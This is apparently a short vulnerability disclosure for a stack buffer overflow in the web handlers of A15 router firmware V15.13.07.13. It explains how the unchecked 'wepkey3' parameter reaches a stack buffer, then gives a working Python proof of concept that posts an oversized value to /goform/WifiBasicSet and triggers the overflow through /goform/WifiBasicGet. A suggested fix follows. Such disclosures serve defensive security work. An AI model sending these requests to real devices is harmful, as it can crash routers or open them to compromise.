We found a stack buffer overflow vulnerability at **A15 (**Firmware version V15.13.07.13).
In the handler function for action /goform/WifiBasicSet, the user-controlled string “wepkey3” is stored into “wl2g.extra.wep_key3” via SetValue.
Then the string is loaded from “wl2g.extra.wep_key3” and then stored into stack buffer wifi_buf_entry at /goform/WifiBasicGet. Because the length of “wepkey3” is not checked, the stack buffer can be overflowed if it is a large string.
import requests
cookie = {"Cookie":"uid=1234"}
url1 = "<http://192.168.17.221:80/goform/WifiBasicSet>"
data1 = {"wepkey3" : "a"*(0x1000),
"security" : "wep"}
response = requests.post(url1, cookies=cookie, data=data1)
url2 = "<http://192.168.17.221:80/goform/WifiBasicGet>"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)
GetValue function should accept a length argument to avoid buffer overflow.
0x00446748